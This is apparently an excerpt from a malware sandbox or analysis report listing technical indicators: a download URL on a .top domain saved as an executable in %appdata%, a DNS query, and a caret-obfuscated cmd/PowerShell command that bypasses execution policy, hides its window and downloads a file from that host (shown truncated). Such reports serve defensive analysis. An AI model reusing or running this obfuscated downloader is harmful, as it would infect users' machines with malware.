Technical Information
- http://newyeargoka.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWerShE^ll^.Ex^e ^-EX^E^CUtIOnP^OLi^CY by^pasS ^-noP^RoF^I^Le^ -^wi^Ndow^s^tylE^ ^hI^DD^En (^NE^W^-o^bjecT S^Yste^M.^neT.^w^EBC^lI^en^t).Do^WN^L^OadFi^l^e('http://newyearg...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "poWerShE^ll^.Ex^e ^-EX^E^CUtIOnP^OLi^CY by^pasS ^-noP^RoF^I^Le^ -^wi^Ndow^s^tylE^ ^hI^DD^En (^NE^W^-o^bjecT S^Yste^M.^neT.^w^EBC^lI^en^t).Do^WN^L^OadFi^l^e('http://newyearg...' (with hidden window)